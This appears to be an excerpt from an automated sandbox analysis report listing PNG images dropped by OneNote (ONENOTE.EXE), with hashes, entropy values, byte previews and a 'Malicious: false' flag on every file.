                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
